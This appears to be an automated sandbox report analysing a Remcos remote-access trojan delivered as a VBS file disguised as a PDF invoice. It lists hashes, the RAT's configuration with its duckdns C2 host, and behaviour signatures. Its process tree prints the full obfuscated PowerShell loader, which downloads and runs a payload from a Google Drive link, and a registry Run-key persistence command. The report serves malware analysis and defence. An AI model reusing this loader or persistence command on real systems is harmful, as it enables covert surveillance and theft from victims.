Overview

overview

10

Static

static

1

A1_racun_1...df.vbs

windows7-x64

10

A1_racun_1...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 01:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    A1_racun_11-2024·pdf.vbs

  • Size

    33KB

  • MD5

    f504f2da583147ba689b230b21f1e8d3

  • SHA1

    50db98c2c533c4b8d253e05341ce99245e6c9af2

  • SHA256

    9f76359976c222dd3a0f75b05b171711f88f60105f2a285dacd3cd122fb56794

  • SHA512

    8b2d7844ea1400316c79d0055039e977eed7336fe7f387c8c2931d8437cebbae3af75431d16c93eeffcdd45ffe1cdc8b3578afe8da008f386dd26eb106545b13

  • SSDEEP

    768:VxCasOdkFIouoA9wVI5XULTNTNk3hEC9cjhZrE0XYfONFZqMVVasDwrqqX:HCasfILrxaOI/J8sDw2Q

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_11-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ultraoutrageous='Zircalloy';;$Velindrettedes='Semihobo';;$Varian='Sabbatsaftenerne';;$Shepherdises='Narkosernes';;$Skraldespand='Indsamlet';;$Untribally=$host.Name;function Skovsaven($availability){If ($Untribally) {$Subahship=4} for ($Undertruck154=$Subahship;;$Undertruck154+=5){if(!$availability[$Undertruck154]) { break }$Kolkhosen+=$availability[$Undertruck154]}$Kolkhosen}function Sanguisuge($Ggeungers){ .($Coaptate) ($Ggeungers)}$Blaring=Skovsaven 'MotoN MulE abtSade.BranwChieE Vi,bChalCWateL skaIBra eTan nE.spT';$Camoufleres=Skovsaven ' TooM Hjoo GenzH liiFlngl nyxlAgroa E o/';$Lagende=Skovsaven 'KontTh ndlAdipsAgua1 Joc2';$Aktivistdkning='Disk[Pr.cNFiliEEskotCrus.UnbeS riEEmerRReguVPresiSrgmcReecesn.lPDetioOms iEmbeNVe.iT Ovem DepaUnreNLovkABedqGOvere CatRPiez]Tu o:un a:Sly s.rafeBasic RekUUnlorTaffiBoltTBranyTwa P b,dr Af,oForhtM soOpaluCRebaOPolyL Pho=Duch$BilllCybeanondGRhabe PolnCallDMaleE';$Camoufleres+=Skovsaven 'Che 5 Euc.In a0 Fo, Cont(Kal WRageiFigunSabadRegioMuskwSpotsMixo Gl mN AfdT Res nt1 S j0Dame.Du.n0 Sny;Imag CoaxWSi,ai S anAare6Forv4F.rs;B ti Ho.xOchl6empa4Aa s; Und TiggrAtr v g a:Gle.1Hock3prus1 Ant.Ordr0 ind).ace .owwGBarkepasscS mikpsycoBly /Paes2Pebe0Ops,1S yr0 De.0Uvrd1Dige0Para1Cojo NautFKaraiTro,rAabeeCob f Pomo Horx qua/deli1Elas3Fdde1Grin. Cal0';$Zihar=Skovsaven 'HectUKlass PoresovrRVist-,owwAOpdaGSpokEFluknfillT';$Adias=Skovsaven 'Hi.th rettScyptsammpSpads.alv:Indt/Tseb/TrovdB tyrUncoi ymovGalreResp.,tragEpisoPytho tvngStrelDelte ipo.,ncocBreaoUnclmBost/ Ridu dagcStab? nale KroxRa mpRdm.oUr.srUnq tA or=FremdTvinoPleawPilonUnislV ndoPharaFooldpane&Bommi OdodTrol= ffe1TekssInc.V Ca 7Alvi_BillZ Arm8 SnoYBr v3NykokThal1 Xv.cSenty Psy2Pi kjReenBBund6 estf PtaaGinnSDrsadKarra akS He tTreeGOverJ ItiD irkfDigoE ors3B rd9 Sam8 Cacg';$prominence=Skovsaven 'Gara>';$Coaptate=Skovsaven 'RestiEjeneSvovX';$Foldningerne='Unsilly';$silicles='\Kathlin.Sta';Sanguisuge (Skovsaven 'Coun$UndeGH vdl DowODu ebSu ea ecilDisp:HypeaSh.aNU deTNeuri nazk,runVRuttiExtetCuireulritGen sSto,f ,omOcassrFlgeF Su ADe iLS ttSSt mKClainblaaIHidanItalG FemeForsRStre=R.gm$LerneSporNSemivK.dl:induaHarmPC emp ShiD D gaBesttD ejaGram+S lm$HalvSVildIL.geLForkiAleeCBla L Srne rfas');Sanguisuge (Skovsaven 'K nt$AntiGHalvLForsO KribDisla AveL mba:OutsP VaaOF enlBnknY n nMKalki PhyxDrmmIHjema ns=logi$ vaga,rdlD R lIf,gla .ntsUr d.Un osS lup urL elei nintFjle(Sh k$UndlPPop rPensOAu imBegyiLocuN AbseCr oNInsecPastE bl)');Sanguisuge (Skovsaven $Aktivistdkning);$Adias=$Polymixia[0];$Fiskedrtters=(Skovsaven 'Incr$Fo,dGSkrml arOUdmeB PlraVaskl Orp:TurbOFyldx.nfey Un,d GreEFornnOmbr= enN ceceG ujW kk-PotsO Ps.B CamJUncoEOverc Udkt ,nd HairSMyo yKa,psCoheTJen E RebmS or.t yr$reocboz nlPlexA anRReimIdimiNWhipG');Sanguisuge ($Fiskedrtters);Sanguisuge (Skovsaven 'Dial$F ktOCeraxAlwiyAdstdSa meBeskn Afl. De.HKa teEn,yaOaredDepoe,gesr PresTeos[ Sp $Ud fZTheriL,njhSpi aWhabrBite]P si=Mil $FagfCCineaStenmRefro alcuD stf Pedl LoueEnd rS.rieU.bus');$Maerker=Skovsaven 'Den $He,eOIn.axHypeyAlqudSugge agan Dea. vitDFrugoesopwTirenExtelSpi oRetiaAutod T gF,ntiiDerolA.sleEnkr(Into$Dio,A F,rd SeniA koaVanssStam,Oce $KandLEduce Hu.vSocreDialr ProiOv,rn ligFo nsDobbb ekle KantFo.ti iednOctogRdste BlulDr,asOcree Madr kat)';$Leveringsbetingelser=$Antikvitetsforfalskninger;Sanguisuge (Skovsaven 'Dyst$ ComgR seLke noAfviB DanaBridlLyst: UlvLledeATillcFilik LoaEuddaR n,ne PseRRepu=meto(Ove TPenueS imSAdapTUnv -VindPGuttA Bl,tPredhSt.i hrv$St eLbirde oggV SvuE Sp.R ortIAmmaNDiagG omSStyrbMidnE mprT.rcaIa.oln ,nrGFagbEOutpLTracSFin ES urr ola)');while (!$Lackerer) {Sanguisuge (Skovsaven 'isoz$Sel g uel Gr,oAerob alaThrel Pul:GldsGSee e Vinn iceHastvherae nrer or=Sac $SeggbGreel UdgyUn maIndknta dtR cisSkovsAa.ep ShaiUnbedPatcsKr,meHjorrBudseNo.rs') ;Sanguisuge $Maerker;Sanguisuge (Skovsaven 'Par SCyclTE keaantiRNonlTSiru- IllsUnidlHomoeAfleEC,anpUve For 4');Sanguisuge (Skovsaven ' Hje$ entg S al NedoGalaBPersaCapiL lie: agtl SeeaAvercS,ctKElecEGrderBollE T xR utt=Udkm(NaevTPendeEbdos TratHumm-UnbapAnabaFightPredhOrke Opdr$ orslgryleBespVAntiEPedir ReniG nfNPolygL keS rembO.teEOverTEmbaiBil NExpeGMisaeCicaL Tops RegEUnalrRy.t)') ;Sanguisuge (Skovsaven 'eneb$PejlGekstlTamaoP isbComma ohl Ref:SekoTWamerFrowRMadbeEnnePintrlFerrA.fgidEquisLnmoe ShoR ontSLiss=Eksp$ologgIltelSoluoEmisBGaleaUnd LM.si:Subem InaAGel Ltn,eFN khEiag ASp ns Graa MamNAlcytSkif+slap+Valu%Til.$aetopRet.oIl.iLBespYHvirmVurditab xSlu IKultARe.l. BasCRefrOgel UTry N dyrT') ;$Adias=$Polymixia[$Trrepladsers]}$Retranquilise=310647;$Tredvtedels=29480;Sanguisuge (Skovsaven 'Fast$Om,yg olkLFatiOSmrhb S.ia konlPer,: Unds GliY Netd VilF dgOrebar aighFlerASla efynsN hanG F.y Sau= U.l Fri.GSupeERailtAnap- lovc,ongo Span vert ndE Pa nTrastKrat T ds$RetslEntoeswedVFaste .emRSlidiRetsNddsyGTrims ,obbPengEUdhnTFrugiPin.N shpgSymbEHypel Rens ddaeophir');Sanguisuge (Skovsaven ' Acr$IchtgAlpel TaloMorbbProlaS,lllFin,: ChiDEfphe.mercVenteBaken Milnfor a TyprRhamyMedi A m=Afst Aff [LiggSbu.cy onosNyctt,ntie Be mS an.Mic CReino lumn DefvAlkoe Masr ilt Bj ] U,a:tyr,: DioF NovrBahroTalkmPyelBtranaZoo.sI reepaah6Mnni4Da sSEskatratirMeoaiRawen SpugValg( Inj$ArveS Pshy,perdCochfBl soPre,rStarh PhyaUnieeTillnboudg,upe)');Sanguisuge (Skovsaven 'Fami$ pinGSemil ubyOlycoBWorkaUn ol Vid:invaIQueeN idgTChonEAgg.rK dav CapAH peLalumg hasR .nvN ridspew.EPo.tNStan Rdgr=dis Affi[Di,eSCritYV resp gmtKonnE E iMBaad.Bud,T ragePalsXbullTHy e.ebelEBortNT,inC.illoS ndDSandi L nN nstgdece]Fari: Lep:Intra kaaS roocBibli,hipi S,u.SemigPhytE AskTNo bSSyneT.ultR yri ftaNt ldG Sau(Pant$ tedsy teEgg cParaeGr tNUndenV,ndaskriRluceyD,il)');Sanguisuge (Skovsaven 'Po,y$ Ke GB nilTom O S.gBKil,AFo bl.imi:SnirB eksLsyndU Ovee GonpC,inrS.rviSe vNTramTUn isLupi5surt0Grnt= Fl $ .iliOutwnTeaktnatiESnapr Laev BonA ullMo.vgClatRMedlnVedes AlkE ,tonskam.KartsJerquF atbPropSHopptC,oarfbliI StrNFaneGrabi(Posi$CocrRSkr E,evaTTilgRSkatADiskNJ,baQLin u,eciIMiljl alI rovSHygre unk,S.mb$Sek,TMa rr ,erEgullDImpoV llyTBelaeRun.dInsoESoapl T,nsAkti)');Sanguisuge $Blueprints50;"
      2⤵
      • Blocklisted process makes network request
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ultraoutrageous='Zircalloy';;$Velindrettedes='Semihobo';;$Varian='Sabbatsaftenerne';;$Shepherdises='Narkosernes';;$Skraldespand='Indsamlet';;$Untribally=$host.Name;function Skovsaven($availability){If ($Untribally) {$Subahship=4} for ($Undertruck154=$Subahship;;$Undertruck154+=5){if(!$availability[$Undertruck154]) { break }$Kolkhosen+=$availability[$Undertruck154]}$Kolkhosen}function Sanguisuge($Ggeungers){ .($Coaptate) ($Ggeungers)}$Blaring=Skovsaven 'MotoN MulE abtSade.BranwChieE Vi,bChalCWateL skaIBra eTan nE.spT';$Camoufleres=Skovsaven ' TooM Hjoo GenzH liiFlngl nyxlAgroa E o/';$Lagende=Skovsaven 'KontTh ndlAdipsAgua1 Joc2';$Aktivistdkning='Disk[Pr.cNFiliEEskotCrus.UnbeS riEEmerRReguVPresiSrgmcReecesn.lPDetioOms iEmbeNVe.iT Ovem DepaUnreNLovkABedqGOvere CatRPiez]Tu o:un a:Sly s.rafeBasic RekUUnlorTaffiBoltTBranyTwa P b,dr Af,oForhtM soOpaluCRebaOPolyL Pho=Duch$BilllCybeanondGRhabe PolnCallDMaleE';$Camoufleres+=Skovsaven 'Che 5 Euc.In a0 Fo, Cont(Kal WRageiFigunSabadRegioMuskwSpotsMixo Gl mN AfdT Res nt1 S j0Dame.Du.n0 Sny;Imag CoaxWSi,ai S anAare6Forv4F.rs;B ti Ho.xOchl6empa4Aa s; Und TiggrAtr v g a:Gle.1Hock3prus1 Ant.Ordr0 ind).ace .owwGBarkepasscS mikpsycoBly /Paes2Pebe0Ops,1S yr0 De.0Uvrd1Dige0Para1Cojo NautFKaraiTro,rAabeeCob f Pomo Horx qua/deli1Elas3Fdde1Grin. Cal0';$Zihar=Skovsaven 'HectUKlass PoresovrRVist-,owwAOpdaGSpokEFluknfillT';$Adias=Skovsaven 'Hi.th rettScyptsammpSpads.alv:Indt/Tseb/TrovdB tyrUncoi ymovGalreResp.,tragEpisoPytho tvngStrelDelte ipo.,ncocBreaoUnclmBost/ Ridu dagcStab? nale KroxRa mpRdm.oUr.srUnq tA or=FremdTvinoPleawPilonUnislV ndoPharaFooldpane&Bommi OdodTrol= ffe1TekssInc.V Ca 7Alvi_BillZ Arm8 SnoYBr v3NykokThal1 Xv.cSenty Psy2Pi kjReenBBund6 estf PtaaGinnSDrsadKarra akS He tTreeGOverJ ItiD irkfDigoE ors3B rd9 Sam8 Cacg';$prominence=Skovsaven 'Gara>';$Coaptate=Skovsaven 'RestiEjeneSvovX';$Foldningerne='Unsilly';$silicles='\Kathlin.Sta';Sanguisuge (Skovsaven 'Coun$UndeGH vdl DowODu ebSu ea ecilDisp:HypeaSh.aNU deTNeuri nazk,runVRuttiExtetCuireulritGen sSto,f ,omOcassrFlgeF Su ADe iLS ttSSt mKClainblaaIHidanItalG FemeForsRStre=R.gm$LerneSporNSemivK.dl:induaHarmPC emp ShiD D gaBesttD ejaGram+S lm$HalvSVildIL.geLForkiAleeCBla L Srne rfas');Sanguisuge (Skovsaven 'K nt$AntiGHalvLForsO KribDisla AveL mba:OutsP VaaOF enlBnknY n nMKalki PhyxDrmmIHjema ns=logi$ vaga,rdlD R lIf,gla .ntsUr d.Un osS lup urL elei nintFjle(Sh k$UndlPPop rPensOAu imBegyiLocuN AbseCr oNInsecPastE bl)');Sanguisuge (Skovsaven $Aktivistdkning);$Adias=$Polymixia[0];$Fiskedrtters=(Skovsaven 'Incr$Fo,dGSkrml arOUdmeB PlraVaskl Orp:TurbOFyldx.nfey Un,d GreEFornnOmbr= enN ceceG ujW kk-PotsO Ps.B CamJUncoEOverc Udkt ,nd HairSMyo yKa,psCoheTJen E RebmS or.t yr$reocboz nlPlexA anRReimIdimiNWhipG');Sanguisuge ($Fiskedrtters);Sanguisuge (Skovsaven 'Dial$F ktOCeraxAlwiyAdstdSa meBeskn Afl. De.HKa teEn,yaOaredDepoe,gesr PresTeos[ Sp $Ud fZTheriL,njhSpi aWhabrBite]P si=Mil $FagfCCineaStenmRefro alcuD stf Pedl LoueEnd rS.rieU.bus');$Maerker=Skovsaven 'Den $He,eOIn.axHypeyAlqudSugge agan Dea. vitDFrugoesopwTirenExtelSpi oRetiaAutod T gF,ntiiDerolA.sleEnkr(Into$Dio,A F,rd SeniA koaVanssStam,Oce $KandLEduce Hu.vSocreDialr ProiOv,rn ligFo nsDobbb ekle KantFo.ti iednOctogRdste BlulDr,asOcree Madr kat)';$Leveringsbetingelser=$Antikvitetsforfalskninger;Sanguisuge (Skovsaven 'Dyst$ ComgR seLke noAfviB DanaBridlLyst: UlvLledeATillcFilik LoaEuddaR n,ne PseRRepu=meto(Ove TPenueS imSAdapTUnv -VindPGuttA Bl,tPredhSt.i hrv$St eLbirde oggV SvuE Sp.R ortIAmmaNDiagG omSStyrbMidnE mprT.rcaIa.oln ,nrGFagbEOutpLTracSFin ES urr ola)');while (!$Lackerer) {Sanguisuge (Skovsaven 'isoz$Sel g uel Gr,oAerob alaThrel Pul:GldsGSee e Vinn iceHastvherae nrer or=Sac $SeggbGreel UdgyUn maIndknta dtR cisSkovsAa.ep ShaiUnbedPatcsKr,meHjorrBudseNo.rs') ;Sanguisuge $Maerker;Sanguisuge (Skovsaven 'Par SCyclTE keaantiRNonlTSiru- IllsUnidlHomoeAfleEC,anpUve For 4');Sanguisuge (Skovsaven ' Hje$ entg S al NedoGalaBPersaCapiL lie: agtl SeeaAvercS,ctKElecEGrderBollE T xR utt=Udkm(NaevTPendeEbdos TratHumm-UnbapAnabaFightPredhOrke Opdr$ orslgryleBespVAntiEPedir ReniG nfNPolygL keS rembO.teEOverTEmbaiBil NExpeGMisaeCicaL Tops RegEUnalrRy.t)') ;Sanguisuge (Skovsaven 'eneb$PejlGekstlTamaoP isbComma ohl Ref:SekoTWamerFrowRMadbeEnnePintrlFerrA.fgidEquisLnmoe ShoR ontSLiss=Eksp$ologgIltelSoluoEmisBGaleaUnd LM.si:Subem InaAGel Ltn,eFN khEiag ASp ns Graa MamNAlcytSkif+slap+Valu%Til.$aetopRet.oIl.iLBespYHvirmVurditab xSlu IKultARe.l. BasCRefrOgel UTry N dyrT') ;$Adias=$Polymixia[$Trrepladsers]}$Retranquilise=310647;$Tredvtedels=29480;Sanguisuge (Skovsaven 'Fast$Om,yg olkLFatiOSmrhb S.ia konlPer,: Unds GliY Netd VilF dgOrebar aighFlerASla efynsN hanG F.y Sau= U.l Fri.GSupeERailtAnap- lovc,ongo Span vert ndE Pa nTrastKrat T ds$RetslEntoeswedVFaste .emRSlidiRetsNddsyGTrims ,obbPengEUdhnTFrugiPin.N shpgSymbEHypel Rens ddaeophir');Sanguisuge (Skovsaven ' Acr$IchtgAlpel TaloMorbbProlaS,lllFin,: ChiDEfphe.mercVenteBaken Milnfor a TyprRhamyMedi A m=Afst Aff [LiggSbu.cy onosNyctt,ntie Be mS an.Mic CReino lumn DefvAlkoe Masr ilt Bj ] U,a:tyr,: DioF NovrBahroTalkmPyelBtranaZoo.sI reepaah6Mnni4Da sSEskatratirMeoaiRawen SpugValg( Inj$ArveS Pshy,perdCochfBl soPre,rStarh PhyaUnieeTillnboudg,upe)');Sanguisuge (Skovsaven 'Fami$ pinGSemil ubyOlycoBWorkaUn ol Vid:invaIQueeN idgTChonEAgg.rK dav CapAH peLalumg hasR .nvN ridspew.EPo.tNStan Rdgr=dis Affi[Di,eSCritYV resp gmtKonnE E iMBaad.Bud,T ragePalsXbullTHy e.ebelEBortNT,inC.illoS ndDSandi L nN nstgdece]Fari: Lep:Intra kaaS roocBibli,hipi S,u.SemigPhytE AskTNo bSSyneT.ultR yri ftaNt ldG Sau(Pant$ tedsy teEgg cParaeGr tNUndenV,ndaskriRluceyD,il)');Sanguisuge (Skovsaven 'Po,y$ Ke GB nilTom O S.gBKil,AFo bl.imi:SnirB eksLsyndU Ovee GonpC,inrS.rviSe vNTramTUn isLupi5surt0Grnt= Fl $ .iliOutwnTeaktnatiESnapr Laev BonA ullMo.vgClatRMedlnVedes AlkE ,tonskam.KartsJerquF atbPropSHopptC,oarfbliI StrNFaneGrabi(Posi$CocrRSkr E,evaTTilgRSkatADiskNJ,baQLin u,eciIMiljl alI rovSHygre unk,S.mb$Sek,TMa rr ,erEgullDImpoV llyTBelaeRun.dInsoESoapl T,nsAkti)');Sanguisuge $Blueprints50;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Hybridt% -windowstyle 1 $Absi=(gp -Path 'HKCU:\Software\Mellemdistancevaaben\').Slagsangene179;%Hybridt% ($Absi)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Hybridt% -windowstyle 1 $Absi=(gp -Path 'HKCU:\Software\Mellemdistancevaaben\').Slagsangene179;%Hybridt% ($Absi)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    da5981361e395e1fbeee672e3681252b

    SHA1

    aadb206017b90c0843e321d20644ec135663ba1e

    SHA256

    cbaeb8d62de5650006858c625bc16bdef33ede2d0b16f2761b2820b43d7803ce

    SHA512

    992e992a7188c757b7c48e9b9aca610cb2d915293d5c69881930de78896999a069b9e2178977bc5dc2c943d804bfcefdb9f13c7b6cee5f5d8378285f468ce4a7

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab8873.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarEA2.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Kathlin.Sta
    Filesize

    442KB

    MD5

    a7f0821a4cc7b62ce5b9fc2a77f8c734

    SHA1

    31c987eed44c7132dd2acefab1cbfd6609ee3975

    SHA256

    b7e932637253db899317e33068f243d7d945ad71359f79b7ba741642081769f9

    SHA512

    34db5f0331f331bdaba26997fc8c842834ec792a7a8b39a10b34b4c8b14035c775dd92572277d15170e11ed2327a823caa8a197a83dd8aca6fa7fab061e87167

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSVU5WYR4T49TZMNIQBN.temp
    Filesize

    7KB

    MD5

    e0fed1c047cb318b62ad6bb09f13edb6

    SHA1

    1315cccecb10cafaff0a63341ed475352ed8f2eb

    SHA256

    f9f6f644e10dab3b08cb4d9b08987319139e8e0e02e611ebf4ab1c806a99b7e7

    SHA512

    756313b10b058965564a2733487d5b093486b5f8b3c57dd1302428cfb769e8bcb4e2aef0cbb13c1d97291ee9b777c5abfc6660d075a531f9cd52e948d1f68d9b

    Download Submit

  • memory/1476-62-0x0000000000D80000-0x0000000001DE2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1476-60-0x0000000000D80000-0x0000000001DE2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2632-37-0x00000000067B0000-0x0000000009BB1000-memory.dmp

    Filesize

    52.0MB

    Download

  • memory/2720-23-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2720-29-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-30-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2720-31-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-33-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-27-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-26-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-25-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-24-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-21-0x000000001B590000-0x000000001B872000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2720-22-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-20-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

    Download